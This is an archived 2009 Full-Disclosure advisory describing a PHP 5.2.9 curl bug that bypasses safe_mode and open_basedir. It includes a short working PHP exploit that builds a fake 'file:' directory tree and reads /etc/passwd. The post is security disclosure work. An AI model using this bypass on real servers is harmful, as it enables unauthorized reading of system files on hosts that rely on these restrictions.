lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 10 Apr 2009 15:21:29 +0200
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PHP 5.2.9 curl safe_mode & open_basedir bypass

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 31.12.2008
- - Pub.: 10.04.2009

Original URL:
http://securityreason.com/achievement_securityalert/61

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows
you to connect and communicate to many different types of servers with
many different types of protocols. libcurl currently supports the http,
https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also
supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this
can also be done with PHP's ftp extension), HTTP form based upload,
proxies, cookies, and user+password authentication.

- --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exist in checking safe_mode & open_basedir for curl
functions. There is a difference between checking the access and the
implementation of the operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");

curl in the first place check safe_mode and open_basedir for

"file:////etc/passwd"
/* realpath is ./file:/etc/passwd */

and in next step will read

"file:////etc/passwd"
(without wrapper => /etc/passwd)

To attack, we need to cheat php by creating a virtual tree like

./file:/
./file:/etc/
./file:/etc/passwd/

Example for /etc/hosts :

./file:/
./file:/etc/
./file:/etc/hosts/

So if you execute the file as user X, we have to create special
subdirectories.

- ---EXAMPLE-EXPLOIT---
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);
- ---EXAMPLE-EXPLOIT---

The previous changes, may contribute to this error in php 5.2.9.
We will discourages the use ( safe_mode & open_basedir ) as the main
security.

Exploit:
http://securityreason.com/achievement_exploitalert/11

- --- 2. Fix ---
Not use safe_mode and open_basedir like a main safety

- --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAknfVzEACgkQpiCeOKaYa9bB7wCfUGnETLIyNN1de0A/wwLumeAy
wHMAn3OiRiuKq9ZL4zM0YNH6ix+NSNtQ
=Hcjr
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ